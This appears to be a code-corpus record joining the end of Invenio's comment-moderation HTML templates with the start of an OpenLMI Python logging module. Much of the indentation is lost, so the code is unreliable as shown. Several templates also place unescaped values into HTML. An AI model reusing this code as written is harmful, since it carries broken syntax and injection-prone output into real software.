out += '<th>' + _("Email") + '</th>\n'
out += '<th>' + _("User ID") + '</th>\n'
if CFG_WEBCOMMENT_ALLOW_REVIEWS > 0:
out += '<th>' + _("Number positive votes") + '</th>\n'
out += '<th>' + _("Number negative votes") + '</th>\n'
out += '<th>' + _("Total number votes") + '</th>\n'
out += '<th>' + _("Total number of reports") + '</th>\n'
out += '<th>' + _("View all user's reported comments/reviews") + '</th>\n'
out += """
</tr>
</thead>
<tbody>%s
</tbody>
</table>
""" % user_rows
return out
def tmpl_admin_select_comment_checkbox(self, cmt_id):
""" outputs a checkbox named "comidXX" where XX is cmt_id """
return '<input type="checkbox" name="comid%i" />' % int(cmt_id)
def tmpl_admin_user_info(self, ln, nickname, uid, email):
""" prepares informations about a user"""
_ = gettext_set_language(ln)
out = """
%(nickname_label)s: %(messaging)s<br />
%(uid_label)s: %(uid)i<br />
%(email_label)s: <a href="mailto:%(email)s">%(email)s</a>"""
out %= {'nickname_label': _("Nickname"),
'messaging': self.create_messaging_link(uid, nickname, ln),
'uid_label': _("User ID"),
'uid': int(uid),
'email_label': _("Email"),
'email': email}
return out
def tmpl_admin_review_info(self, ln, reviews, nb_reports, cmt_id, rec_id, status):
""" outputs information about a review """
_ = gettext_set_language(ln)
if reviews:
reported_label = _("This review has been reported %i times")
else:
reported_label = _("This comment has been reported %i times")
reported_label %= int(nb_reports)
out = """
%(reported_label)s<br />
<a href="%(siteurl)s/record/%(rec_id)i?ln=%(ln)s">%(rec_id_label)s</a><br />
%(cmt_id_label)s"""
out %= {'reported_label': reported_label,
'rec_id_label': _("Record") + ' #' + str(rec_id),
'siteurl': CFG_SITE_URL,
'rec_id': int(rec_id),
'cmt_id_label': _("Comment") + ' #' + str(cmt_id),
'ln': ln}
if status in ['dm', 'da']:
out += '<br /><div style="color:red;">Marked as deleted</div>'
return out
def tmpl_admin_latest(self, ln, comment_data, comments, error, user_collections, collection):
"""
@param comment_data: same type of tuple as that
        which is returned by webcommentadminlib.py/query_get_latest i.e.
tuple (nickname, uid, date_creation, body, id) if latest comments or
tuple (nickname, uid, date_creation, body, star_score, id) if latest reviews
"""
_ = gettext_set_language(ln)
out = """
<script type='text/javascript'>
function collectionChange()
{
document.collection_form.submit();
}
</script>
"""
out += '<form method="get" name="collection_form" action="%s/admin/webcomment/webcommentadmin.py/latest?ln=%s&comments=%s">' % (CFG_SITE_URL, ln, comments)
out += '<input type="hidden" name="ln" value=%s>' % ln
out += '<input type="hidden" name="comments" value=%s>' % comments
out += '<div> Filter by collection: <select name="collection" onchange="javascript:collectionChange();">'
for collection_name in user_collections:
if collection_name == collection:
out += '<option "SELECTED" value="%(collection_name)s">%(collection_name)s</option>' % {'collection_name': cgi.escape(collection_name)}
else:
out += '<option value="%(collection_name)s">%(collection_name)s</option>' % {'collection_name': cgi.escape(collection_name)}
out += '</select></div></form><br />'
if error == 1:
out += "<i>User is not authorized to view such collection.</i><br />"
return out
elif error == 2:
out += "<i>There are no %s for this collection.</i><br />" % (comments and 'comments' or 'reviews')
return out
out += """
<ol>
"""
for (cmt_tuple, meta_data) in comment_data:
bibrec_id = meta_data[3]
content = format_record(bibrec_id, "hs")
if not comments:
out += """
<li> %(content)s <br/> <span class="moreinfo"> <a class="moreinfo" href=%(comment_url)s> reviewed by %(user)s</a>
(%(stars)s) \"%(body)s\" on <i> %(date)s </i></li> </span> <br/>
""" % {'content': content,
'comment_url': CFG_SITE_URL + '/record/' + str(bibrec_id) + '/reviews',
'user':cmt_tuple[0] ,
'stars': '*' * int(cmt_tuple[4]) ,
'body': cmt_tuple[3][:20] + '...',
'date': cmt_tuple[2]}
else:
out += """
<li> %(content)s <br/> <span class="moreinfo"> <a class="moreinfo" href=%(comment_url)s> commented by %(user)s</a>,
\"%(body)s\" on <i> %(date)s </i></li> </span> <br/>
""" % {'content': content,
'comment_url': CFG_SITE_URL + '/record/' + str(bibrec_id) + '/comments',
'user':cmt_tuple[0] ,
'body': cmt_tuple[3][:20] + '...',
'date': cmt_tuple[2]}
out += """</ol>"""
return out
def tmpl_admin_hot(self, ln, comment_data, comments, error, user_collections, collection):
"""
@param comment_data: same type of tuple as that
        which is returned by webcommentadminlib.py/query_get_hot i.e.
tuple (id_bibrec, date_last_comment, users, count)
"""
_ = gettext_set_language(ln)
out = """
<script type='text/javascript'>
function collectionChange()
{
document.collection_form.submit();
}
</script>
"""
out += '<form method="get" name="collection_form" action="%s/admin/webcomment/webcommentadmin.py/hot?ln=%s&comments=%s">' % (CFG_SITE_URL, ln, comments)
out += '<input type="hidden" name="ln" value=%s>' % ln
out += '<input type="hidden" name="comments" value=%s>' % comments
out += '<div> Filter by collection: <select name="collection" onchange="javascript:collectionChange();">'
for collection_name in user_collections:
if collection_name == collection:
out += '<option "SELECTED" value="%(collection_name)s">%(collection_name)s</option>' % {'collection_name': cgi.escape(collection_name)}
else:
out += '<option value="%(collection_name)s">%(collection_name)s</option>' % {'collection_name': cgi.escape(collection_name)}
out += '</select></div></form><br />'
if error == 1:
out += "<i>User is not authorized to view such collection.</i><br />"
return out
elif error == 2:
out += "<i>There are no %s for this collection.</i><br />" % (comments and 'comments' or 'reviews')
return out
        out += """
        <ol>
        """
        for cmt_tuple in comment_data:
bibrec_id = cmt_tuple[0]
content = format_record(bibrec_id, "hs")
last_comment_date = cmt_tuple[1]
total_users = cmt_tuple[2]
total_comments = cmt_tuple[3]
if comments:
comment_url = CFG_SITE_URL + '/record/' + str(bibrec_id) + '/comments'
str_comment = int(total_comments) > 1 and 'comments' or 'comment'
else:
comment_url = CFG_SITE_URL + '/record/' + str(bibrec_id) + '/reviews'
str_comment = int(total_comments) > 1 and 'reviews' or 'review'
out += """
<li> %(content)s <br/> <span class="moreinfo"> <a class="moreinfo" href=%(comment_url)s> %(total_comments)s
%(str_comment)s</a>
(%(total_users)s %(user)s), latest on <i> %(last_comment_date)s </i></li> </span> <br/>
""" % {'content': content,
'comment_url': comment_url ,
'total_comments': total_comments,
'str_comment': str_comment,
'total_users': total_users,
'user': int(total_users) > 1 and 'users' or 'user',
'last_comment_date': last_comment_date}
out += """</ol>"""
return out
def tmpl_admin_comments(self, ln, uid, comID, recID, comment_data, reviews, error, user_collections, collection):
"""
@param comment_data: same type of tuple as that
which is returned by webcomment.py/query_retrieve_comments_or_remarks i.e.
tuple of comment where comment is
tuple (nickname,
date_creation,
body,
id) if ranking disabled or
tuple (nickname,
date_creation,
body,
nb_votes_yes,
nb_votes_total,
star_score,
title,
id)
"""
_ = gettext_set_language(ln)
coll_form = """
<script type='text/javascript'>
function collectionChange()
{
document.collection_form.submit();
}
</script>
"""
coll_form += '<form method="get" name="collection_form" action="%s/admin/webcomment/webcommentadmin.py/comments?ln=%s&reviews=%s">' % (CFG_SITE_URL, ln, reviews)
coll_form += '<input type="hidden" name="ln" value=%s>' % ln
coll_form += '<input type="hidden" name="reviews" value=%s>' % reviews
coll_form += '<div> Filter by collection: <select name="collection" onchange="javascript:collectionChange();">'
for collection_name in user_collections:
if collection_name == collection:
coll_form += '<option "SELECTED" value="%(collection_name)s">%(collection_name)s</option>' % {'collection_name': cgi.escape(collection_name)}
else:
coll_form += '<option value="%(collection_name)s">%(collection_name)s</option>' % {'collection_name': cgi.escape(collection_name)}
coll_form += '</select></div></form><br />'
if error == 1:
coll_form += "<i>User is not authorized to view such collection.</i><br />"
return coll_form
elif error == 2:
coll_form += "<i>There are no %s for this collection.</i><br />" % (reviews and 'reviews' or 'comments')
return coll_form
comments = []
comments_info = []
checkboxes = []
users = []
for (cmt_tuple, meta_data) in comment_data:
if reviews:
comments.append(self.tmpl_get_comment_with_ranking(None,#request object
ln,
cmt_tuple[0],#nickname
cmt_tuple[1],#userid
cmt_tuple[2],#date_creation
cmt_tuple[3],#body
cmt_tuple[9],#status
0,
cmt_tuple[5],#nb_votes_total
cmt_tuple[4],#nb_votes_yes
cmt_tuple[6],#star_score
cmt_tuple[7]))#title
else:
comments.append(self.tmpl_get_comment_without_ranking(None,#request object
ln,
cmt_tuple[0],#nickname
cmt_tuple[1],#userid
cmt_tuple[2],#date_creation
cmt_tuple[3],#body
cmt_tuple[5],#status
0,
None, #reply_link
None, #report_link
None, #undelete_link
None)) #delete_links
users.append(self.tmpl_admin_user_info(ln,
meta_data[0], #nickname
meta_data[1], #uid
meta_data[2]))#email
if reviews:
status = cmt_tuple[9]
else:
status = cmt_tuple[5]
comments_info.append(self.tmpl_admin_review_info(ln,
reviews,
meta_data[5], # nb abuse reports
meta_data[3], # cmt_id
meta_data[4], # rec_id
status)) # status
checkboxes.append(self.tmpl_admin_select_comment_checkbox(meta_data[3]))
form_link = "%s/admin/webcomment/webcommentadmin.py/del_com?ln=%s" % (CFG_SITE_URL, ln)
out = """
<table class="admin_wvar" style="width:100%%;">
<thead>
<tr class="adminheaderleft">
<th>%(review_label)s</th>
<th>%(written_by_label)s</th>
<th>%(review_info_label)s</th>
<th>%(select_label)s</th>
</tr>
</thead>
<tbody>""" % {'review_label': reviews and _("Review") or _("Comment"),
'written_by_label': _("Written by"),
'review_info_label': _("General informations"),
'select_label': _("Select")}
for i in range (0, len(comments)):
out += """
<tr>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
<td class="admintd" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
</tr>""" % (comments[i], users[i], comments_info[i], checkboxes[i])
out += """
</tbody>
</table>"""
if reviews:
action_display = {
'delete': _('Delete selected reviews'),
'unreport': _('Suppress selected abuse report'),
'undelete': _('Undelete selected reviews')
}
else:
action_display = {
'undelete': _('Undelete selected comments'),
'delete': _('Delete selected comments'),
'unreport': _('Suppress selected abuse report')
}
form = self.tmpl_create_multiple_actions_form(form_name="admin_comment",
form_action=form_link,
method="post",
action_display=action_display,
action_field_name='action',
button_label=_("OK"),
button_name="okbutton",
content=out)
if uid > 0:
header = '<br />'
if reviews:
header += _("Here are the reported reviews of user %s") % uid
else:
header += _("Here are the reported comments of user %s") % uid
header += '<br /><br />'
if comID > 0 and recID <= 0 and uid <= 0:
if reviews:
header = '<br />' +_("Here is review %s")% comID + '<br /><br />'
else:
header = '<br />' +_("Here is comment %s")% comID + '<br /><br />'
if uid > 0 and comID > 0 and recID <= 0:
if reviews:
header = '<br />' + _("Here is review %(x_cmtID)s written by user %(x_user)s") % {'x_cmtID': comID, 'x_user': uid}
else:
header = '<br />' + _("Here is comment %(x_cmtID)s written by user %(x_user)s") % {'x_cmtID': comID, 'x_user': uid}
            header += '<br /><br />'
if comID <= 0 and recID <= 0 and uid <= 0:
header = '<br />'
if reviews:
header += _("Here are all reported reviews sorted by the most reported")
else:
header += _("Here are all reported comments sorted by the most reported")
header += "<br /><br />"
elif recID > 0:
header = '<br />'
if reviews:
header += _("Here are all reviews for record %i, sorted by the most reported" % recID)
header += '<br /><a href="%s/admin/webcomment/webcommentadmin.py/delete?comid=&recid=%s&reviews=0">%s</a>' % (CFG_SITE_URL, recID, _("Show comments"))
else:
header += _("Here are all comments for record %i, sorted by the most reported" % recID)
header += '<br /><a href="%s/admin/webcomment/webcommentadmin.py/delete?comid=&recid=%s&reviews=1">%s</a>' % (CFG_SITE_URL, recID, _("Show reviews"))
header += "<br /><br />"
return coll_form + header + form
def tmpl_admin_del_com(self, del_res, ln=CFG_SITE_LANG):
"""
@param del_res: list of the following tuple (comment_id, was_successfully_deleted),
        was_successfully_deleted is boolean (0=false, >0=true)
"""
_ = gettext_set_language(ln)
table_rows = ''
for deltuple in del_res:
table_rows += """
<tr>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
</tr>""" % (deltuple[0], deltuple[1]>0 and _("Yes") or "<span class=\"important\">" +_("No") + "</span>")
out = """
<table class="admin_wvar">
<tr class="adminheaderleft">
<td style="padding-right:10px;">%s</td>
<td>%s</td>
</tr>%s
<table>""" % (_("comment ID"), _("successfully deleted"), table_rows)
return out
def tmpl_admin_undel_com(self, del_res, ln=CFG_SITE_LANG):
"""
@param del_res: list of the following tuple (comment_id, was_successfully_undeleted),
        was_successfully_undeleted is boolean (0=false, >0=true)
"""
_ = gettext_set_language(ln)
table_rows = ''
for deltuple in del_res:
table_rows += """
<tr>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
</tr>""" % (deltuple[0], deltuple[1]>0 and _("Yes") or "<span class=\"important\">" +_("No") + "</span>")
out = """
<table class="admin_wvar">
<tr class="adminheaderleft">
<td style="padding-right:10px;">%s</td>
<td>%s</td>
</tr>%s
<table>""" % (_("comment ID"), _("successfully undeleted"), table_rows)
return out
def tmpl_admin_suppress_abuse_report(self, del_res, ln=CFG_SITE_LANG):
"""
@param del_res: list of the following tuple (comment_id, was_successfully_deleted),
        was_successfully_deleted is boolean (0=false, >0=true)
"""
_ = gettext_set_language(ln)
table_rows = ''
for deltuple in del_res:
table_rows += """
<tr>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
</tr>""" % (deltuple[0], deltuple[1]>0 and _("Yes") or "<span class=\"important\">" +_("No") + "</span>")
out = """
<table class="admin_wvar">
<tr class="adminheaderleft">
<td style ="padding-right: 10px;">%s</td>
<td>%s</td>
</tr>%s
<table>""" % (_("comment ID"), _("successfully suppressed abuse report"), table_rows)
return out
def tmpl_mini_review(self, recID, ln=CFG_SITE_LANG, action='SUBMIT',
avg_score=0, nb_comments_total=0):
"""Display the mini version of reviews (only the grading part)"""
_ = gettext_set_language(ln)
url = '%s/record/%s/reviews/add?ln=%s&action=%s' % (CFG_SITE_URL, recID, ln, action)
if avg_score > 0:
score = _("Average review score: %(x_nb_score)s based on %(x_nb_reviews)s reviews") % \
{'x_nb_score': '<b>%.1f</b>' % avg_score,
'x_nb_reviews': nb_comments_total}
else:
            score = '(' + _("Not yet reviewed") + ')'
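        # Map the average score onto five star images, rounding down to the
        # nearest half star (e.g. 4.7 renders as four and a half stars).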
if avg_score == 5:
s1, s2, s3, s4, s5 = 'full', 'full', 'full', 'full', 'full'
elif avg_score >= 4.5:
s1, s2, s3, s4, s5 = 'full', 'full', 'full', 'full', 'half'
elif avg_score >= 4:
s1, s2, s3, s4, s5 = 'full', 'full', 'full', 'full', ''
elif avg_score >= 3.5:
s1, s2, s3, s4, s5 = 'full', 'full', 'full', 'half', ''
elif avg_score >= 3:
s1, s2, s3, s4, s5 = 'full', 'full', 'full', '', ''
elif avg_score >= 2.5:
s1, s2, s3, s4, s5 = 'full', 'full', 'half', '', ''
elif avg_score >= 2:
s1, s2, s3, s4, s5 = 'full', 'full', '', '', ''
elif avg_score >= 1.5:
s1, s2, s3, s4, s5 = 'full', 'half', '', '', ''
        elif avg_score >= 1:
s1, s2, s3, s4, s5 = 'full', '', '', '', ''
else:
s1, s2, s3, s4, s5 = '', '', '', '', ''
out = '''
<small class="detailedRecordActions">%(rate)s:</small><br /><br />
<div style="margin:auto;width:160px;">
<span style="display:none;">Rate this document:</span>
<div class="star %(s1)s" ><a href="%(url)s&score=1">1</a>
<div class="star %(s2)s" ><a href="%(url)s&score=2">2</a>
<div class="star %(s3)s" ><a href="%(url)s&score=3">3</a>
<div class="star %(s4)s" ><a href="%(url)s&score=4">4</a>
<div class="star %(s5)s" ><a href="%(url)s&score=5">5</a></div></div></div></div></div>
<div style="clear:both"> </div>
</div>
<small>%(score)s</small>
''' % {'url': url,
'score': score,
'rate': _("Rate this document"),
's1': s1,
's2': s2,
's3': s3,
's4': s4,
's5': s5
}
return out
def tmpl_email_new_comment_header(self, recID, title, reviews,
comID, report_numbers,
can_unsubscribe=True,
ln=CFG_SITE_LANG, uid=-1):
"""
Prints the email header used to notify subscribers that a new
comment/review was added.
        @param recID: the ID of the commented/reviewed record
        @param title: the title of the commented/reviewed record
        @param reviews: True if it is a review, False if it is a comment
@param comID: the comment ID
@param report_numbers: the report number(s) of the record
@param can_unsubscribe: True if user can unsubscribe from alert
@param ln: language
"""
# load the right message language
_ = gettext_set_language(ln)
user_info = collect_user_info(uid)
out = _("Hello:") + '\n\n' + \
(reviews and _("The following review was sent to %(CFG_SITE_NAME)s by %(user_nickname)s:") or \
_("The following comment was sent to %(CFG_SITE_NAME)s by %(user_nickname)s:")) % \
{'CFG_SITE_NAME': CFG_SITE_NAME,
'user_nickname': user_info['nickname']}
out += '\n(<%s>)' % (CFG_SITE_URL + '/record/' + str(recID))
out += '\n\n\n'
return out
def tmpl_email_new_comment_footer(self, recID, title, reviews,
comID, report_numbers,
can_unsubscribe=True,
ln=CFG_SITE_LANG):
"""
Prints the email footer used to notify subscribers that a new
comment/review was added.
        @param recID: the ID of the commented/reviewed record
        @param title: the title of the commented/reviewed record
        @param reviews: True if it is a review, False if it is a comment
@param comID: the comment ID
@param report_numbers: the report number(s) of the record
@param can_unsubscribe: True if user can unsubscribe from alert
@param ln: language
"""
# load the right message language
_ = gettext_set_language(ln)
out = '\n\n-- \n'
out += _("This is an automatic message, please don't reply to it.")
out += '\n'
out += _("To post another comment, go to <%(x_url)s> instead.") % \
{'x_url': CFG_SITE_URL + '/record/' + str(recID) + \
(reviews and '/reviews' or '/comments') + '/add'}
out += '\n'
if not reviews:
out += _("To specifically reply to this comment, go to <%(x_url)s>") % \
{'x_url': CFG_SITE_URL + '/record/' + str(recID) + \
'/comments/add?action=REPLY&comid=' + str(comID)}
out += '\n'
if can_unsubscribe:
out += _("To unsubscribe from this discussion, go to <%(x_url)s>") % \
{'x_url': CFG_SITE_URL + '/record/' + str(recID) + \
'/comments/unsubscribe'}
out += '\n'
out += _("For any question, please use <%(CFG_SITE_SUPPORT_EMAIL)s>") % \
{'CFG_SITE_SUPPORT_EMAIL': CFG_SITE_SUPPORT_EMAIL}
return out
def tmpl_email_new_comment_admin(self, recID):
"""
Prints the record information used in the email to notify the
system administrator that a new comment has been posted.
@param recID: the ID of the commented/reviewed record
"""
out = ""
title = get_fieldvalues(recID, "245__a")
authors = ', '.join(get_fieldvalues(recID, "100__a") + get_fieldvalues(recID, "700__a"))
#res_author = ""
#res_rep_num = ""
#for author in authors:
# res_author = res_author + ' ' + author
dates = get_fieldvalues(recID, "260__c")
report_nums = get_fieldvalues(recID, "037__a")
report_nums += get_fieldvalues(recID, "088__a")
report_nums = ', '.join(report_nums)
#for rep_num in report_nums:
# res_rep_num = res_rep_num + ', ' + rep_num
out += " Title = %s \n" % (title and title[0] or "No Title")
out += " Authors = %s \n" % authors
if dates:
out += " Date = %s \n" % dates[0]
out += " Report number = %s" % report_nums
return out
|
valkyriesavage/invenio
|
modules/webcomment/lib/webcomment_templates.py
|
Python
|
gpl-2.0
| 109,498
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2014 Red Hat, Inc. All rights reserved.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Authors: Jan Safranek <jsafrane@redhat.com>
"""
Contains handlers and loggers specific to provider logging running
under a cimom.
"""
import logging
import logging.config
import functools
import inspect
from itertools import chain
import os
import sys
# Custom logging levels
TRACE_WARNING = logging.DEBUG - 1
TRACE_INFO = logging.DEBUG - 2
TRACE_VERBOSE = logging.DEBUG - 3
#: Mapping from level name to its number.
LOGGING_LEVELS = {
"critical" : logging.CRITICAL,
"error" : logging.ERROR,
"warning" : logging.WARNING,
"warn" : logging.WARNING,
"info" : logging.INFO,
"debug" : logging.DEBUG,
"trace_warning" : TRACE_WARNING,
"trace_info" : TRACE_INFO,
"trace_verbose" : TRACE_VERBOSE
}
#: This associates special format strings to various logger names
SPECIAL_FORMAT_STRINGS = {
"lmi.providers.cmpi_logging.trace_function_or_method" :
"%(levelname)s:%(message)s"
}
#: Default format string to use in stderr and cmpi handlers.
DEFAULT_FORMAT_STRING = \
"%(levelname)s:%(module)s:%(funcName)s:%(lineno)d - %(message)s"
class DispatchingFormatter(object):
"""
    Formatter class for the logging module. It allows one to predefine a
    different format string for particular module names.
    There is no way to set up this formatter in a configuration file.
"""
def __init__(self, formatters, default):
"""
        *format* in the parameter descriptions can be either a ``string`` or
        another formatter object.
        :param dict formatters: Mapping of module names to *format*.
        :param default: Default *format*.
"""
for k, formatter in formatters.items():
if isinstance(formatter, basestring):
formatters[k] = logging.Formatter(formatter)
self._formatters = formatters
if isinstance(default, basestring):
default = logging.Formatter(default)
self._default_formatter = default
def format(self, record):
"""
Interface for logging module.
"""
formatter = self._formatters.get(record.name, self._default_formatter)
return formatter.format(record)
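# A minimal usage sketch for DispatchingFormatter (the logger name below is
# hypothetical; DEFAULT_FORMAT_STRING is defined above in this module):
#
#     handler = logging.StreamHandler()
#     handler.setFormatter(DispatchingFormatter(
#         {"lmi.providers.example": "%(levelname)s: %(message)s"},
#         DEFAULT_FORMAT_STRING))
#     logging.getLogger().addHandler(handler)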
class CMPILogHandler(logging.Handler):
"""
A handler class, which sends log messages to CMPI log.
"""
def __init__(self, cmpi_logger, *args, **kwargs):
self.cmpi_logger = cmpi_logger
logging.Handler.__init__(self, *args, **kwargs)
def emit(self, record):
msg = self.format(record)
msg = msg.encode('utf-8') if isinstance(msg, unicode) else str(msg)
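        # Route the record to the CMPI logging call matching its severity,
        # from ERROR down to the custom TRACE_* levels defined above.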
if record.levelno >= logging.ERROR:
self.cmpi_logger.log_error(msg)
elif record.levelno >= logging.WARNING:
self.cmpi_logger.log_warn(msg)
elif record.levelno >= logging.INFO:
self.cmpi_logger.log_info(msg)
elif record.levelno >= logging.DEBUG:
self.cmpi_logger.log_debug(msg)
elif record.levelno >= TRACE_WARNING:
self.cmpi_logger.trace_warn(record.filename, msg)
elif record.levelno >= TRACE_INFO:
self.cmpi_logger.trace_info(record.filename, msg)
elif record.levelno >= TRACE_VERBOSE:
self.cmpi_logger.trace_verbose(record.filename, msg)
class CMPILogger(logging.getLoggerClass()):
"""
A logger class, which adds trace_method level log methods.
"""
def trace_warn(self, msg, *args, **kwargs):
""" Log message with TRACE_WARNING severity. """
self.log(TRACE_WARNING, msg, *args, **kwargs)
def trace_info(self, msg, *args, **kwargs):
""" Log message with TRACE_INFO severity. """
self.log(TRACE_INFO, msg, *args, **kwargs)
def trace_verbose(self, msg, *args, **kwargs):
""" Log message with TRACE_VERBOSE severity. """
self.log(TRACE_VERBOSE, msg, *args, **kwargs)
def _log(self, level, msg, args, exc_info=None, extra=None):
"""
        Overrides the ``_log()`` function of the basic ``Logger``. The purpose
        is to log tracebacks with a different level instead of ERROR to
        prevent them from being logged to syslog.
"""
if logging._srcfile:
#IronPython doesn't track Python frames, so findCaller throws an
#exception on some versions of IronPython. We trap it here so that
#IronPython can use logging.
try:
fn, lno, func = self.findCaller()
except ValueError:
fn, lno, func = "(unknown file)", 0, "(unknown function)"
else:
fn, lno, func = "(unknown file)", 0, "(unknown function)"
if exc_info:
if not isinstance(exc_info, tuple):
exc_info = sys.exc_info()
record = self.makeRecord(self.name, level, fn, lno, msg, args,
None, func, extra)
self.handle(record)
record = self.makeRecord(self.name, TRACE_WARNING, fn,
lno, str(exc_info[1]), tuple(), exc_info, func, extra)
else:
record = self.makeRecord(self.name, level, fn, lno, msg,
args, exc_info, func, extra)
self.handle(record)
logging.setLoggerClass(CMPILogger)
def render_value(val):
"""
When logging values, we want to avoid excessively long messages caused
by rendering argument values like lists, dictionaries etc.
    Let's shorten these iterable objects to just one or a few items.
:param val: Any value for rendering.
:returns: Representation string of value, possibly shortened.
:rtype: string
"""
if isinstance(val, list):
if len(val) < 2:
return repr(val)
else:
return "[%s, ... (%d more items)]" % (
render_value(val[0]), len(val) - 1)
elif isinstance(val, dict):
if len(val) < 2:
return repr(val)
else:
key = next(iter(val))
return '{%s: %s, ... (%d more items)}' % (
render_value(key), render_value(val[key]), len(val) - 1)
elif isinstance(val, set):
if len(val) < 2:
return repr(val)
else:
            return '{%s, ... (%d more items)}' % (
                render_value(next(iter(val))), len(val) - 1)
elif isinstance(val, tuple):
return "(%s%s)" % (
", ".join(render_value(i) for i in val),
", " if len(val) < 2 else '')
return repr(val)
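# Illustrative expectations for render_value (hypothetical values; for dicts
# and sets the sampled item depends on iteration order):
#   render_value([1, 2, 3])  ->  "[1, ... (2 more items)]"
#   render_value((1,))       ->  "(1,)"
#   render_value({"a": 1})   ->  "{'a': 1}"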
def _trace_function_or_method(is_method=False, frame_level=1):
"""
    Factory for function and method decorators. Generated decorators
    log every call and exit of decorated functions or methods.
    Logged information contains the caller's module and line together with
    the called function's module, function name and line number.
:param boolean is_method: Whether returned decorator is targeted
        for use upon a method of a class. It modifies the logged function
        name by prepending the owning class name.
:param integer frame_level: Number of nested frames to skip when
searching for called function scope by inspecting stack upwards.
        When the result of this function is applied directly on the
        definition of a function, its value should be 1. When used from
        inside some other factory, it must be increased by 1.
"""
assert frame_level >= 1
def _decorator(func):
"""
Decorator for logging entries and exits of function or method.
"""
if not inspect.ismethod(func) and not inspect.isfunction(func):
raise TypeError("func must be a function")
module = func.__module__.split('.')[-1]
frm = inspect.currentframe()
for _ in range(frame_level):
frm = frm.f_back
lineno = frm.f_lineno
del frm
classname = inspect.getouterframes(
inspect.currentframe())[frame_level][3]
@functools.wraps(func)
def _wrapper(*args, **kwargs):
"""
Wrapper for function or method, that does the logging.
"""
logger = logging.getLogger(__name__+'.trace_function_or_method')
logargs = {}
if logger.isEnabledFor(TRACE_VERBOSE):
frm = inspect.currentframe()
logargs.update({
"caller_file" : os.path.basename(os.path.splitext(
frm.f_back.f_code.co_filename)[0]),
"caller_lineno" : frm.f_back.f_lineno,
"module" : module,
"func" : classname + "." + func.__name__
if is_method else func.__name__,
"lineno" : lineno,
"action" : "entering",
"args" : ", ".join(chain(
(render_value(a) for a in args),
( "%s=%s"%(k, render_value(v))
for k, v in kwargs.items())))
})
if not logargs["args"]:
logargs["args"] = ""
else:
logargs["args"] = " with args=(%s)" % logargs["args"]
logger.trace_verbose("%(caller_file)s:%(caller_lineno)d - "
"%(action)s %(module)s:%(func)s:%(lineno)d%(args)s",
logargs)
try:
result = func(*args, **kwargs)
if logger.isEnabledFor(TRACE_VERBOSE):
logargs["action"] = "exiting"
logger.trace_verbose("%(caller_file)s:%(caller_lineno)d"
" - %(action)s %(module)s:%(func)s:%(lineno)d",
logargs)
except Exception as exc:
if logger.isEnabledFor(TRACE_VERBOSE):
logargs['action'] = 'exiting'
logargs['error'] = str(exc)
logger.trace_verbose("%(caller_file)s:%(caller_lineno)d"
" - %(action)s %(module)s:%(func)s:%(lineno)d"
" with error: %(error)s", logargs)
raise
return result
return _wrapper
return _decorator
def _trace_function(func, frame_level=1):
""" Convenience function used for decorating simple functions. """
return trace_function_or_method(frame_level=frame_level + 1)(func)
def _trace_method(func, frame_level=1):
""" Convenience function used for decorating methods. """
return trace_function_or_method(True, frame_level + 1)(func)
def _identity_decorator(func, *args, **kwargs):
""" Decorator returning the function itself. """
return func
# Tracing decorators may be disabled by environment variable.
if os.getenv("LMI_DISABLE_TRACING_DECORATORS", "0").lower() in \
("1", "true", "yes", "on"):
    # Tracing decorators disabled. Functions and methods won't get modified
# in any way.
trace_function_or_method = _identity_decorator
trace_function = _identity_decorator
trace_method = _identity_decorator
else:
# Tracing decorators enabled.
trace_function_or_method = _trace_function_or_method
trace_function = _trace_function
trace_method = _trace_method
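# Typical (hypothetical) use of the tracing decorators defined above:
#
#     @trace_function
#     def compute(x, y):
#         return x + y
#
# Calls to compute() are then logged on entry and exit at TRACE_VERBOSE
# level, unless LMI_DISABLE_TRACING_DECORATORS has disabled the decorators.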
def try_setup_from_file(config):
"""
Try to configure logging with a file specified in configuration.
    :returns: ``True`` if the file configuration is given, successfully
parsed and carried out.
:rtype: boolean
"""
try:
path = config.file_path('Log', 'FileConfig')
if not os.path.exists(path):
logging.getLogger(__name__).error('given FileConfig "%s" does'
' not exist', path)
else:
logging.config.fileConfig(path)
return True
except Exception:
if config.config.has_option('Log', 'FileConfig'):
logging.getLogger(__name__).exception(
'failed to setup logging from FileConfig')
return False
def setup(env, config, special_format_strings=None):
"""
Set up the logging with options stored in
:py:class:`lmi.base.BaseConfiguration` instance. This should be called
at provider's startup before any message is sent to log.
:param ProviderEnvironment env: Provider environment, taken from CIMOM
callback (e.g. ``get_providers()``).
:param config: Configuration with Log section containing settings for
logging.
:type config: :py:class:`lmi.base.BaseConfiguration`
    :param dictionary special_format_strings: Assigns special format
        strings to various loggers. It overrides pairs in
        :py:data:`SPECIAL_FORMAT_STRINGS`. Its format is the following: ::
{ ( 'logger_name' : 'format_string_to_use' ), ... }
"""
if ( special_format_strings is not None
and not isinstance(special_format_strings, dict)):
raise TypeError("special_format_strings must be a dictionary")
if try_setup_from_file(config):
return
logging_level = logging.ERROR
    if config.logging_level not in LOGGING_LEVELS:
logging.getLogger(__name__).error(
'level name "%s" not supported', config.logging_level)
else:
logging_level = LOGGING_LEVELS[config.logging_level]
logger = logging.getLogger()
logger.setLevel(logging_level)
# remove any previously set handlers
for handler in logger.handlers[:]:
logger.removeHandler(handler)
